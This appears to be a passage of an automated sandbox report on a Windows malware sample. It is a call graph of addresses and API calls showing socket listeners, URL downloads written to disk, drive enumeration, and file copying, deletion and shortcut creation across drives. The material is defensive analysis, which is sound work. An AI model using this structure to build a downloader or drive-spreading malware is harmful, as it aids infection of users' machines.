5067->5068 5068->5062 5069 40f369 5068->5069 5070 40ab60 __aligned_recalloc_base 3 API calls 5069->5070 5071 40f372 5070->5071 5071->5062 5073 40cbd0 10 API calls 5072->5073 5074 40d1c4 5073->5074 5074->5062 5074->5066 5076 40e1bd htons inet_addr setsockopt 5075->5076 5081 40e2ee 5075->5081 5077 40b430 8 API calls 5076->5077 5078 40e236 bind lstrlenA sendto ioctlsocket 5077->5078 5084 40e28b 5078->5084 5081->4563 5082 40e2b2 5132 40b4f0 shutdown closesocket 5082->5132 5083 40a990 9 API calls 5083->5084 5084->5082 5084->5083 5123 40e310 5084->5123 5139 40e640 memset InternetCrackUrlA InternetOpenA 5085->5139 5089 40ab60 __aligned_recalloc_base 3 API calls 5090 40e51e 5089->5090 5090->4563 5094 40e4eb 5094->5089 5097 40e4e1 SysFreeString 5097->5094 5246 40b3f0 inet_addr 5100->5246 5103 40b48c connect 5104 40b4a0 getsockname 5103->5104 5105 40b4d4 5103->5105 5104->5105 5249 40b4f0 shutdown closesocket 5105->5249 5107 40b4dd 5108 40eef0 5107->5108 5250 40b3d0 inet_ntoa 5108->5250 5110 40ef06 5111 40d470 11 API calls 5110->5111 5112 40ef25 5111->5112 5117 40e14c 5112->5117 5251 40ef70 memset InternetCrackUrlA InternetOpenA 5112->5251 5115 40ab60 __aligned_recalloc_base 3 API calls 5118 40ef5c 5115->5118 5116 40ab60 __aligned_recalloc_base 3 API calls 5116->5117 5117->4569 5118->5116 5122 40ac84 5119->5122 5120 40ac8a 5120->4562 5121 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5121->5122 5122->5120 5122->5121 5128 40e32c 5123->5128 5124 40e3f4 5124->5084 5125 40e348 recvfrom 5126 40e376 StrCmpNIA 5125->5126 5127 40e369 Sleep 5125->5127 5126->5128 5129 40e395 StrStrIA 5126->5129 5127->5128 5128->5124 5128->5125 5129->5128 5130 40e3b6 StrChrA 5129->5130 5133 40d320 5130->5133 5132->5081 5134 40d32b 5133->5134 5135 40d331 lstrlenA 5134->5135 5136 40a950 __aligned_recalloc_base 7 API calls 5134->5136 5137 40d344 5134->5137 5138 40d360 memcpy 5134->5138 5135->5134 5135->5137 5136->5134 5137->5128 5138->5134 5138->5137 5140 40e6e1 InternetConnectA 5139->5140 5141 40e41a 5139->5141 5142 40e84a InternetCloseHandle 5140->5142 5143 40e71a HttpOpenRequestA 5140->5143 5141->5090 5152 40e530 5141->5152 5142->5141 5144 40e750 HttpSendRequestA 5143->5144 5145 40e83d InternetCloseHandle 5143->5145 5146 40e830 InternetCloseHandle 5144->5146 5148 40e76d 5144->5148 5145->5142 5146->5145 5147 40e78e InternetReadFile 5147->5148 5149 40e7bb 5147->5149 5148->5147 5148->5149 5150 40a990 9 API calls 5148->5150 5149->5146 5151 40e7d6 memcpy 5150->5151 5151->5148 5181 40d250 5152->5181 5155 40e433 5155->5094 5162 40eea0 5155->5162 5156 40e55a SysAllocString 5157 40e571 CoCreateInstance 5156->5157 5158 40e627 5156->5158 5159 40e61d SysFreeString 5157->5159 5161 40e596 5157->5161 5160 40ab60 __aligned_recalloc_base 3 API calls 5158->5160 5159->5158 5160->5155 5161->5159 5198 40e9f0 5162->5198 5165 40e870 5203 40ecc0 5165->5203 5170 40ee20 6 API calls 5171 40e8c7 5170->5171 5177 40e4b2 5171->5177 5220 40eae0 5171->5220 5174 40e8ff 5174->5177 5225 40e990 5174->5225 5175 40eae0 6 API calls 5175->5174 5177->5097 5178 40d470 5177->5178 5241 40d3e0 5178->5241 5185 40d25d 5181->5185 5182 40d263 lstrlenA 5182->5185 5187 40d276 5182->5187 5184 40a950 __aligned_recalloc_base 7 API calls 5184->5185 5185->5182 5185->5184 5185->5187 5188 40ab60 __aligned_recalloc_base 3 API calls 5185->5188 5189 405740 5185->5189 5193 4056f0 5185->5193 5187->5155 5187->5156 5188->5185 5190 405757 MultiByteToWideChar 5189->5190 5191 40574a lstrlenA 5189->5191 5192 40577c 5190->5192 5191->5190 5192->5185 5194 4056fb 5193->5194 5195 405701 lstrlenA 5194->5195 5196 405740 2 API calls 5194->5196 5197 405737 5194->5197 5195->5194 5196->5194 5197->5185 5201 40ea16 5198->5201 5199 40e49d 5199->5094 5199->5165 5200 40ea93 lstrcmpiW 5200->5201 5202 40eaab SysFreeString 5200->5202 5201->5199 5201->5200 5201->5202 5202->5201 5205 40ece6 5203->5205 5204 40e88b 5204->5177 5215 40ee20 5204->5215 5205->5204 5206 40ed73 lstrcmpiW 5205->5206 5207 40edf3 SysFreeString 5206->5207 5208 40ed86 5206->5208 5207->5204 5209 40e990 2 API calls 5208->5209 5211 40ed94 5209->5211 5210 40ede5 5210->5207 5211->5207 5211->5210 5212 40edc3 lstrcmpiW 5211->5212 5213 40edd5 5212->5213 5214 40eddb SysFreeString 5212->5214 5213->5214 5214->5210 5216 40e990 2 API calls 5215->5216 5217 40ee3b 5216->5217 5218 40ecc0 6 API calls 5217->5218 5219 40e8a9 5217->5219 5218->5219 5219->5170 5219->5177 5221 40e990 2 API calls 5220->5221 5222 40eafb 5221->5222 5224 40e8e5 5222->5224 5229 40eb60 5222->5229 5224->5174 5224->5175 5226 40e9b6 5225->5226 5227 40e9cd 5226->5227 5228 40e9f0 2 API calls 5226->5228 5227->5177 5228->5227 5230 40eb86 5229->5230 5231 40ec9d 5230->5231 5232 40ec13 lstrcmpiW 5230->5232 5231->5224 5233 40ec93 SysFreeString 5232->5233 5234 40ec26 5232->5234 5233->5231 5235 40e990 2 API calls 5234->5235 5237 40ec34 5235->5237 5236 40ec85 5236->5233 5237->5233 5237->5236 5238 40ec63 lstrcmpiW 5237->5238 5239 40ec75 5238->5239 5240 40ec7b SysFreeString 5238->5240 5239->5240 5240->5236 5245 40d3ed 5241->5245 5242 40d390 _vscprintf wvsprintfA 5242->5245 5243 40d408 SysFreeString 5243->5097 5244 40a990 9 API calls 5244->5245 5245->5242 5245->5243 5245->5244 5247 40b409 gethostbyname 5246->5247 5248 40b41c socket 5246->5248 5247->5248 5248->5103 5248->5107 5249->5107 5250->5110 5252 40ef47 5251->5252 5253 40f014 InternetConnectA 5251->5253 5252->5115 5252->5118 5254 40f194 InternetCloseHandle 5253->5254 5255 40f04d HttpOpenRequestA 5253->5255 5254->5252 5256 40f083 HttpAddRequestHeadersA HttpSendRequestA 5255->5256 5257 40f187 InternetCloseHandle 5255->5257 5258 40f17a InternetCloseHandle 5256->5258 5261 40f0cd 5256->5261 5257->5254 5258->5257 5259 40f0e4 InternetReadFile 5260 40f111 5259->5260 5259->5261 5260->5258 5261->5259 5261->5260 5262 40a990 9 API calls 5261->5262 5263 40f12c memcpy 5262->5263 5263->5261 5270 407417 5264->5270 5265 407670 CoCreateInstance 5265->5270 5266 4075eb 5268 4075f4 SysFreeString 5266->5268 5269 4073bb SysFreeString 5266->5269 5267 40ab60 __aligned_recalloc_base 3 API calls 5267->5266 5268->5269 5269->4572 5270->5265 5271 407566 SysAllocString 5270->5271 5272 407432 5270->5272 5271->5270 5271->5272 5272->5266 5272->5267 5274 40c87a 5273->5274 5275 40c87e 5273->5275 5274->4578 5277 40c830 CryptAcquireContextW 5275->5277 5278 40c86b 5277->5278 5279 40c84d CryptGenRandom CryptReleaseContext 5277->5279 5278->5274 5279->5278 5280->4596 5332 40b780 gethostname 5281->5332 5284 40b869 5284->4596 5286 40b87c strcmp 5286->5284 5287 40b891 5286->5287 5336 40b3d0 inet_ntoa 5287->5336 5289 40b89f strstr 5290 40b8f0 5289->5290 5291 40b8af 5289->5291 5339 40b3d0 inet_ntoa 5290->5339 5337 40b3d0 inet_ntoa 5291->5337 5294 40b8bd strstr 5294->5284 5296 40b8cd 5294->5296 5295 40b8fe strstr 5297 40b90e 5295->5297 5298 40b94f 5295->5298 5338 40b3d0 inet_ntoa 5296->5338 5340 40b3d0 inet_ntoa 5297->5340 5342 40b3d0 inet_ntoa 5298->5342 5302 40b95d strstr 5305 40b96d 5302->5305 5306 40b9ae EnterCriticalSection 5302->5306 5303 40b8db strstr 5303->5284 5303->5290 5304 40b91c strstr 5304->5284 5307 40b92c 5304->5307 5343 40b3d0 inet_ntoa 5305->5343 5310 40b9c6 5306->5310 5341 40b3d0 inet_ntoa 5307->5341 5317 40b9f1 5310->5317 5345 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5310->5345 5311 40b93a strstr 5311->5284 5311->5298 5312 40b97b strstr 5312->5284 5313 40b98b 5312->5313 5344 40b3d0 inet_ntoa 5313->5344 5316 40baea LeaveCriticalSection 5316->5284 5317->5316 5319 40a740 7 API calls 5317->5319 5318 40b999 strstr 5318->5284 5318->5306 5320 40ba35 5319->5320 5320->5316 5346 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5320->5346 5322 40ba53 5323 40ba80 5322->5323 5324 40ba76 Sleep 5322->5324 5326 40baa5 5322->5326 5325 40ab60 __aligned_recalloc_base 3 API calls 5323->5325 5324->5322 5325->5326 5326->5316 5347 40b530 5326->5347 5328->4604 5330 40b530 13 API calls 5329->5330 5331 40b523 LeaveCriticalSection 5330->5331 5331->4598 5333 40b7a7 gethostbyname 5332->5333 5334 40b7c3 5332->5334 5333->5334 5334->5284 5335 40b3d0 inet_ntoa 5334->5335 5335->5286 5336->5289 5337->5294 5338->5303 5339->5295 5340->5304 5341->5311 5342->5302 5343->5312 5344->5318 5345->5317 5346->5322 5348 40b544 5347->5348 5349 40b53f 5347->5349 5350 40a950 __aligned_recalloc_base 7 API calls 5348->5350 5349->5316 5352 40b558 5350->5352 5351 40b5b4 CreateFileW 5353 40b603 InterlockedExchange 5351->5353 5354 40b5d7 WriteFile FlushFileBuffers 5351->5354 5352->5349 5352->5351 5355 40ab60 __aligned_recalloc_base 3 API calls 5353->5355 5354->5353 5355->5349 5359 40dcdd 5356->5359 5357 40dc13 5357->4611 5357->4612 5358 40dd01 WaitForSingleObject 5358->5359 5359->5357 5359->5358 5365 407840 5360->5365 5361 407868 Sleep 5361->5365 5362 40791a Sleep 5362->5365 5363 407897 Sleep wsprintfA DeleteUrlCacheEntry 5390 40f4b0 InternetOpenA 5363->5390 5365->5361 5365->5362 5365->5363 5366 40f560 58 API calls 5365->5366 5366->5365 5368 4058c9 memset GetModuleHandleW 5367->5368 5369 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5368->5369 5369->5369 5370 405940 CreateWindowExW 5369->5370 5371 40596b 5370->5371 5372 40596d GetMessageA 5370->5372 5373 40599f ExitThread 5371->5373 5374 405981 TranslateMessage DispatchMessageA 5372->5374 5375 405997 5372->5375 5374->5372 5375->5368 5375->5373 5397 40f1f0 CreateFileW 5376->5397 5378 4070f8 ExitThread 5380 406fa0 5380->5378 5381 4070e8 Sleep 5380->5381 5382 406fd9 5380->5382 5400 4063e0 GetLogicalDrives 5380->5400 5381->5380 5406 406300 5382->5406 5384 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5387 407086 wsprintfW 5384->5387 5388 40709b wsprintfW 5384->5388 5386 40700b 5387->5388 5412 4068e0 _chkstk 5388->5412 5391 40f4d6 InternetOpenUrlA 5390->5391 5392 40f548 Sleep 5390->5392 5393 40f4f5 HttpQueryInfoA 5391->5393 5394 40f53e InternetCloseHandle 5391->5394 5392->5365 5395 40f534 InternetCloseHandle 5393->5395 5396 40f51e 5393->5396 5394->5392 5395->5394 5396->5395 5398 40f238 5397->5398 5399 40f21f GetFileSize 5397->5399 5398->5380 5399->5398 5405 40640d 5400->5405 5401 406486 5401->5380 5402 40641c RegOpenKeyExW 5403 40643e RegQueryValueExW 5402->5403 5402->5405 5404 40647a RegCloseKey 5403->5404 5403->5405 5404->5405 5405->5401 5405->5402 5405->5404 5407 406359 5406->5407 5408 40631c 5406->5408 5407->5384 5407->5386 5471 406360 GetDriveTypeW 5408->5471 5411 40634b lstrcpyW 5411->5407 5413 4068fe 7 API calls 5412->5413 5442 4068f7 5412->5442 5414 4069d2 5413->5414 5415 406a14 PathFileExistsW 5413->5415 5416 40f1f0 2 API calls 5414->5416 5417 406ac4 5415->5417 5418 406a29 PathFileExistsW 5415->5418 5420 4069de 5416->5420 5419 406af5 PathFileExistsW 5417->5419 5476 4064a0 7 API calls 5417->5476 5421 406a59 PathFileExistsW 5418->5421 5422 406a3a SetFileAttributesW DeleteFileW 5418->5422 5425 406b06 5419->5425 5426 406b47 PathFileExistsW 5419->5426 5420->5415 5424 4069f5 SetFileAttributesW DeleteFileW 5420->5424 5427 406a6a CreateDirectoryW 5421->5427 5428 406a8c PathFileExistsW 5421->5428 5422->5421 5424->5415 5429 40f1f0 2 API calls 5425->5429 5431 406b58 5426->5431 5432 406bca PathFileExistsW 5426->5432 5427->5428 5430 406a7d SetFileAttributesW 5427->5430 5428->5417 5433 406a9d CopyFileW 5428->5433 5437 406b12 5429->5437 5430->5428 5431->5432 5438 406b64 PathFileExistsW 5431->5438 5434 406c75 FindFirstFileW 5432->5434 5435 406bdf PathFileExistsW 5432->5435 5433->5417 5439 406ab5 SetFileAttributesW 5433->5439 5434->5442 5468 406c9c 5434->5468 5440 406bf0 5435->5440 5441 406c2c 5435->5441 5436 406ad4 5436->5419 5443 40f1f0 2 API calls 5436->5443 5437->5426 5444 406b28 SetFileAttributesW DeleteFileW 5437->5444 5438->5432 5445 406b73 CopyFileW 5438->5445 5439->5417 5447 406c12 5440->5447 5448 406bf8 5440->5448 5451 406c34 5441->5451 5452 406c4e 5441->5452 5442->5386 5450 406aed 5443->5450 5444->5426 5445->5432 5446 406b8b SetFileAttributesW PathFileExistsW 5445->5446 5446->5432 5453 406bab SetFileAttributesW DeleteFileW 5446->5453 5457 406660 4 API calls 5447->5457 5487 406660 CoInitialize CoCreateInstance 5448->5487 5449 406d5e lstrcmpW 5456 406d74 lstrcmpW 5449->5456 5449->5468 5450->5419 5458 406660 4 API calls 5451->5458 5454 406660 4 API calls 5452->5454 5453->5432 5459 406c0d SetFileAttributesW 5454->5459 5456->5468 5457->5459 5458->5459 5459->5434 5460 406f35 FindNextFileW 5460->5449 5462 406f51 FindClose 5460->5462 5462->5442 5463 406dba lstrcmpiW 5463->5468 5464 406e21 PathMatchSpecW 5465 406e42 wsprintfW SetFileAttributesW DeleteFileW 5464->5465 5464->5468 5465->5468 5466 406e9f PathFileExistsW 5467 406eb5 wsprintfW wsprintfW 5466->5467 5466->5468 5467->5468 5469 406f1f MoveFileExW 5467->5469 5468->5449 5468->5460 5468->5463 5468->5464 5468->5466 5492 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5468->5492 5469->5460 5472 406388 5471->5472 5474 40633f 5471->5474 5473 40639c QueryDosDeviceW 5472->5473 5472->5474 5473->5474 5475 4063b6 StrCmpNW 5473->5475 5474->5407 5474->5411 5475->5474 5477 406640 InternetCloseHandle 5476->5477 5478 40653e InternetOpenUrlW 5476->5478 5477->5436 5479 406633 InternetCloseHandle 5478->5479 5480 40656b CreateFileW 5478->5480 5479->5477 5481 406626 5480->5481 5482 406598 InternetReadFile 5480->5482 5481->5479 5483 4065eb wsprintfW DeleteFileW 5482->5483 5484 4065bc 5482->5484 5483->5481 5484->5483 5485 4065c5 WriteFile 5484->5485 5485->5482 5488 406696 5487->5488 5491 4066ee 5487->5491 5489 4066a9 wsprintfW 5488->5489 5490 4066cf wsprintfW 5488->5490 5488->5491 5489->5491 5490->5491 5491->5459 5493 4067f5 lstrcmpW 5492->5493 5494 4068cf 5492->5494 5495 40680b lstrcmpW 5493->5495 5499 406821 5493->5499 5494->5468 5497 406823 wsprintfW wsprintfW 5495->5497 5495->5499 5496 40689c FindNextFileW 5496->5493 5500 4068b8 FindClose RemoveDirectoryW 5496->5500 5498 406886 MoveFileExW 5497->5498 5497->5499 5498->5496 5499->5496 5500->5494 5868 40d980 5874 4021b0 5868->5874 5871 40d9bf 5872 40d9a5 WaitForSingleObject 5878 401600 5872->5878 5875 4021cf 5874->5875 5876 4021bb 5874->5876 5875->5871 5875->5872 5876->5875 5899 402020 5876->5899 5879 401737 5878->5879 5880 40160d 5878->5880 5879->5871 5880->5879 5881 401619 EnterCriticalSection 5880->5881 5882 401630 5881->5882 5883 4016b5 LeaveCriticalSection SetEvent 5881->5883 5882->5883 5888 401641 InterlockedDecrement 5882->5888 5890 40165a InterlockedExchangeAdd 5882->5890 5896 4016a0 InterlockedDecrement 5882->5896 5884 4016d0 5883->5884 5885 4016e8 5883->5885 5886 4016d6 PostQueuedCompletionStatus 5884->5886 5887 40dd50 11 API calls 5885->5887 5886->5885 5886->5886 5889 4016f3 5887->5889 5888->5882 5892 40de90 6 API calls 5889->5892 5890->5882 5891 40166d InterlockedIncrement 5890->5891 5893 401c50 4 API calls 5891->5893 5894 4016fc CloseHandle CloseHandle WSACloseEvent 5892->5894 5893->5882 5920 40b4f0 shutdown closesocket 5894->5920 5896->5882 5897 401724 DeleteCriticalSection 5898 40ab60 __aligned_recalloc_base 3 API calls 5897->5898 5898->5879 5900 40a740 7 API calls 5899->5900 5901 40202b 5900->5901 5902 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5901->5902 5908 4021a5 5901->5908 5903 402076 CreateIoCompletionPort 5902->5903 5904 40219f 5902->5904 5903->5904 5905 40208f 5903->5905 5906 401600 35 API calls 5904->5906 5907 40dbb0 8 API calls 5905->5907 5906->5908 5909 402094 5907->5909 5908->5875 5909->5904 5910 40209f WSASocketA 5909->5910 5910->5904 5911 4020bd setsockopt htons bind 5910->5911 5911->5904 5912 402126 listen 5911->5912 5912->5904 5913 40213a WSACreateEvent 5912->5913 5913->5904 5914 402147 WSAEventSelect 5913->5914 5914->5904 5919 402159 5914->5919 5915 40217f 5916 40dbe0 16 API calls 5915->5916 5918 402194 5916->5918 5917 40dbe0 16 API calls 5917->5919 5918->5875 5919->5915 5919->5917 5920->5897 5933 406085 5935 405ffe 5933->5935 5934 40608a LeaveCriticalSection 5935->5934 5936 40abd0 8 API calls 5935->5936 5937 40605c 5936->5937 5937->5934 5501 406fc6 5504 406fa8 5501->5504 5502 4070e8 Sleep 5502->5504 5503 406fd9 5505 406300 4 API calls 5503->5505 5504->5502 5504->5503 5506 4070f8 ExitThread 5504->5506 5509 4063e0 4 API calls 5504->5509 5507 406fea 5505->5507 5508 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5507->5508 5510 40700b 5507->5510 5511 407086 wsprintfW 5508->5511 5512 40709b wsprintfW 5508->5512 5509->5504 5511->5512 5513 4068e0 79 API calls 5512->5513 5513->5510 5938 40f908 5939 40f910 5938->5939 5941 40f9c4 5939->5941 5944 40fb45 5939->5944 5943 40f949 5943->5941 5948 40fa30 RtlUnwind 5943->5948 5945 40fb5a 5944->5945 5947 40fb76 5944->5947 5946 40fbe5 NtQueryVirtualMemory 5945->5946 5945->5947 5946->5947 5947->5943 5949 40fa48 5948->5949 5949->5943 5514 40df50 5517 40bf20 5514->5517 5528 40bf31 5517->5528 5520 40ab60 __aligned_recalloc_base 3 API calls 5521 40c2ff 5520->5521 5522 40c310 21 API calls 5522->5528 5524 40b830 31 API calls 5524->5528 5525 40bf4f 5525->5520 5527 40bed0 13 API calls 5527->5528 5528->5522 5528->5524 5528->5525 5528->5527 5531 40c460 5528->5531 5538 40bc00 EnterCriticalSection 5528->5538 5543 407240 5528->5543 5548 4072e0 5528->5548 5553 407110 5528->5553 5560 407210 5528->5560 5532 40c471 lstrlenA 5531->5532 5533 40cb40 7 API calls 5532->5533 5534 40c48f 5533->5534 5534->5532 5536 40c49b 5534->5536 5535 40ab60 __aligned_recalloc_base 3 API calls 5537 40c51f 5535->5537 5536->5535 5536->5537 5537->5528 5540 40bc18 5538->5540 5539 40bc54 LeaveCriticalSection 5539->5528 5540->5539 5563 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5540->5563 5542 40bc43 5542->5539 5564 407280 5543->5564 5546 407279 5546->5528 5547 40dbe0 16 API calls 5547->5546 5549 407280 75 API calls 5548->5549 5550 4072ff 5549->5550 5551 40732c 5550->5551 5579 407340 5550->5579 5551->5528 5590 405fe0 EnterCriticalSection 5553->5590 5555 40712a 5559 40715d 5555->5559 5595 407170 5555->5595 5558 40ab60 __aligned_recalloc_base 3 API calls 5558->5559 5559->5528 5602 4060a0 EnterCriticalSection 5560->5602 5562 407232 5562->5528 5563->5542 5567 407293 5564->5567 5565 407254 5565->5546 5565->5547 5567->5565 5568 405ef0 EnterCriticalSection 5567->5568 5569 40d1d0 71 API calls 5568->5569 5570 405f0e 5569->5570 5571 405fcb LeaveCriticalSection 5570->5571 5572 405f27 5570->5572 5576 405f48 5570->5576 5571->5567 5573 405f31 memcpy 5572->5573 5574 405f46 5572->5574 5573->5574 5575 40ab60 __aligned_recalloc_base 3 API calls 5574->5575 5577 405fc8 5575->5577 5576->5574 5578 405fa6 memcpy 5576->5578 5577->5571 5578->5574 5582 40be30 5579->5582 5583 40c8b0 3 API calls 5582->5583 5584 40be3b 5583->5584 5585 40be57 lstrlenA 5584->5585 5586 40cb40 7 API calls 5585->5586 5587 40be8d 5586->5587 5588 407385 5587->5588 5589 40ab60 __aligned_recalloc_base 3 API calls 5587->5589 5588->5551 5589->5588 5592 405ffe 5590->5592 5591 40608a LeaveCriticalSection 5591->5555 5592->5591 5593 40abd0 8 API calls 5592->5593 5594 40605c 5593->5594 5594->5591 5596 40a950 __aligned_recalloc_base 7 API calls 5595->5596 5597 407182 memcpy 5596->5597 5598 40be30 13 API calls 5597->5598 5599 4071ec 5598->5599 5600 40ab60 __aligned_recalloc_base 3 API calls 5599->5600 5601 407151 5600->5601 5601->5558 5627 40d230 5602->5627 5605 4062e3 LeaveCriticalSection 5605->5562 5606 40d1d0 71 API calls 5607 4060d9 5606->5607 5607->5605 5608 4061f8 5607->5608 5610 406134 memcpy 5607->5610 5609 406221 5608->5609 5611 405d30 70 API calls 5608->5611 5612 40ab60 __aligned_recalloc_base 3 API calls 5609->5612 5613 40ab60 __aligned_recalloc_base 3 API calls 5610->5613 5611->5609 5614 406242 5612->5614 5615 406158 5613->5615 5614->5605 5616 406251 CreateFileW 5614->5616 5617 40abd0 8 API calls 5615->5617 5616->5605 5618 406274 5616->5618 5619 406168 5617->5619 5622 406291 WriteFile 5618->5622 5623 4062cf FlushFileBuffers 5618->5623 5620 40ab60 __aligned_recalloc_base 3 API calls 5619->5620 5621 40618f 5620->5621 5624 40cb40 7 API calls 5621->5624 5622->5618 5623->5605 5625 4061c5 5624->5625 5626 4076c0 66 API calls 5625->5626 5626->5608 5630 40c780 5627->5630 5631 40c791 5630->5631 5632 40abd0 8 API calls 5631->5632 5633 40c7ab 5631->5633 5634 40c6e0 70 API calls 5631->5634 5637 4084a0 68 API calls 5631->5637 5638 40c7eb memcmp 5631->5638 5632->5631 5635 40ab60 __aligned_recalloc_base 3 API calls 5633->5635 5634->5631 5636 4060c2 5635->5636 5636->5605 5636->5606 5637->5631 5638->5631 5638->5633 5639 401f50 GetQueuedCompletionStatus 5640 402008 5639->5640 5641 401f92 5639->5641 5642 401f97 WSAGetOverlappedResult 5641->5642 5646 401d60 5641->5646 5642->5641 5643 401fb9 WSAGetLastError 5642->5643 5643->5641 5645 401fd3 GetQueuedCompletionStatus 5645->5640 5645->5641 5647 401ef2 InterlockedDecrement setsockopt closesocket 5646->5647 5648 401d74 5646->5648 5649 401e39 5647->5649 5648->5647 5650 401d7c 5648->5650 5649->5645 5666 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5650->5666 5652 401d81 InterlockedExchange 5653 401d98 5652->5653 5654 401e4e 5652->5654 5653->5649 5657 401da9 InterlockedDecrement 5653->5657 5658 401dbc InterlockedDecrement InterlockedExchangeAdd 5653->5658 5655 401e67 5654->5655 5656 401e57 InterlockedDecrement 5654->5656 5659 401e72 5655->5659 5660 401e87 InterlockedDecrement 5655->5660 5656->5645 5657->5645 5662 401e2f 5658->5662 5675 401ae0 WSASend 5659->5675 5661 401ee9 5660->5661 5661->5645 5667 401cf0 5662->5667 5664 401e7e 5664->5645 5666->5652 5668 401d00 InterlockedExchangeAdd 5667->5668 5669 401cfc 5667->5669 5670 401d53 5668->5670 5671 401d17 InterlockedIncrement 5668->5671 5669->5649 5670->5649 5681 401c50 WSARecv 5671->5681 5673 401d46 5673->5670 5674 401d4c InterlockedDecrement 5673->5674 5674->5670 5676 401b50 5675->5676 5677 401b12 WSAGetLastError 5675->5677 5676->5664 5677->5676 5678 401b1f 5677->5678 5679 401b56 5678->5679 5680 401b26 Sleep WSASend 5678->5680 5679->5664 5680->5676 5680->5677 5682 401cd2 5681->5682 5683 401c8e 5681->5683 5682->5673 5684 401c90 WSAGetLastError 5683->5684 5685 401ca4 Sleep WSARecv 5683->5685 5686 401cdb 5683->5686 5684->5682 5684->5683 5685->5682 5685->5684 5686->5673 5687 40db50 5692 401b60 5687->5692 5689 40db65 5690 40db84 5689->5690 5691 401b60 16 API calls 5689->5691 5691->5690 5693 401b70 5692->5693 5711 401c42 5692->5711 5694 40a740 7 API calls 5693->5694 5693->5711 5695 401b9d 5694->5695 5696 40abd0 8 API calls 5695->5696 5695->5711 5697 401bc9 5696->5697 5698 401be6 5697->5698 5699 401bd6 5697->5699 5700 401ae0 4 API calls 5698->5700 5701 40ab60 __aligned_recalloc_base 3 API calls 5699->5701 5702 401bf3 5700->5702 5703 401bdc 5701->5703 5704 401c33 5702->5704 5705 401bfc EnterCriticalSection 5702->5705 5703->5689 5708 40ab60 __aligned_recalloc_base 3 API calls 5704->5708 5706 401c13 5705->5706 5707 401c1f LeaveCriticalSection 5705->5707 5706->5707 5707->5689 5709 401c3c 5708->5709 5710 40ab60 __aligned_recalloc_base 3 API calls 5709->5710 5710->5711 5711->5689 5712 40bdd0 5713 40bdd3 WaitForSingleObject 5712->5713 5714 40be01 5713->5714 5715 40bdeb InterlockedDecrement 5713->5715 5716 40bdfa 5715->5716 5716->5713 5717 40b510 15 API calls 5716->5717 5717->5716 5718 40dfd0 5728 4013b0 5718->5728 5720 40e05d 5722 40dff7 InterlockedExchangeAdd 5723 40e03b WaitForSingleObject 5722->5723 5724 40dfdd 5722->5724 5723->5724 5725 40e054 5723->5725 5724->5720 5724->5722 5724->5723 5740 40bbb0 EnterCriticalSection 5724->5740 5745 40bed0 5724->5745 5748 401330 5725->5748 5729 40a740 7 API calls 5728->5729 5730 4013bb CreateEventA socket 5729->5730 5731 4013f2 5730->5731 5732 4013f8 5730->5732 5733 401330 7 API calls 5731->5733 5734 401401 bind 5732->5734 5735 401462 5732->5735 5733->5732 5736 401444 CreateThread 5734->5736 5737 401434 5734->5737 5735->5724 5736->5735 5738 401330 7 API calls 5737->5738 5739 40143a 5738->5739 5739->5724 5741 40bbe7 LeaveCriticalSection 5740->5741 5742 40bbcf 5740->5742 5741->5724 5743 40c870 3 API calls 5742->5743 5744 40bbda 5743->5744 5744->5741 5746 40be30 13 API calls 5745->5746 5747 40bf11 5746->5747 5747->5724 5749 401339 5748->5749 5757 40139b 5748->5757 5750 401341 SetEvent WaitForSingleObject 5749->5750 5749->5757 5755 401362 5750->5755 5751 40138b 5758 40b4f0 shutdown closesocket 5751->5758 5753 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5753->5755 5754 401395 5756 40ab60 __aligned_recalloc_base 3 API calls 5754->5756 5755->5751 5755->5753 5756->5757 5757->5720 5758->5754 5759 40d9d0 5760 40da3e 5759->5760 5761 40d9e6 5759->5761 5761->5760 5762 40d9f0 5761->5762 5763 40da43 5761->5763 5764 40da93 5761->5764 5767 40a740 7 API calls 5762->5767 5765 40da68 5763->5765 5766 40da5b InterlockedDecrement 5763->5766 5793 40c570 5764->5793 5769 40ab60 __aligned_recalloc_base 3 API calls 5765->5769 5766->5765 5770 40d9fd 5767->5770 5771 40da74 5769->5771 5782 4023d0 5770->5782 5773 40ab60 __aligned_recalloc_base 3 API calls 5771->5773 5773->5760 5776 40dab9 5776->5760 5779 40daf1 IsBadReadPtr 5776->5779 5781 40bf20 186 API calls 5776->5781 5798 40c670 5776->5798 5778 40da2b InterlockedIncrement 5778->5760 5779->5776 5781->5776 5783 402413 5782->5783 5784 4023d9 5782->5784 5786 40b6f0 5783->5786 5784->5783 5785 4023ea InterlockedIncrement 5784->5785 5785->5783 5787 40b780 2 API calls 5786->5787 5788 40b6ff 5787->5788 5789 40b70d EnterCriticalSection 5788->5789 5790 40b709 5788->5790 5791 40b72c LeaveCriticalSection 5789->5791 5790->5760 5790->5778 5791->5790 5794 40c583 5793->5794 5795 40c5ad memcpy 5793->5795 5796 40a990 9 API calls 5794->5796 5795->5776 5797 40c5a4 5796->5797 5797->5795 5799 40c699 5798->5799 5800 40c68e 5798->5800 5799->5800 5801 40c6b1 memmove 5799->5801 5800->5776 5801->5800 5964 40f910 5965 40f92e 5964->5965 5967 40f9c4 5964->5967 5966 40fb45 NtQueryVirtualMemory 5965->5966 5969 40f949 5966->5969 5968 40fa30 RtlUnwind 5968->5969 5969->5967 5969->5968 5970 40d510 5971 40b6f0 4 API calls 5970->5971 5972 40d523 5971->5972 5973 40d53a 5972->5973 5975 40d550 InterlockedExchangeAdd 5972->5975 5976 40d566 5975->5976 5977 40d56d 5975->5977 5976->5973 5992 40d840 5977->5992 5980 40d58d InterlockedIncrement 5989 40d597 5980->5989 5981 40bed0 13 API calls 5981->5989 5982 40d5c0 5999 40b3d0 inet_ntoa 5982->5999 5984 40d5cc 5985 40d690 InterlockedDecrement 5984->5985 6000 40b4f0 shutdown closesocket 5985->6000 5987 40a950 __aligned_recalloc_base 7 API calls 5987->5989 5988 40d770 6 API calls 5988->5989 5989->5981 5989->5982 5989->5985 5989->5987 5989->5988 5990 40bf20 186 API calls 5989->5990 5991 40ab60 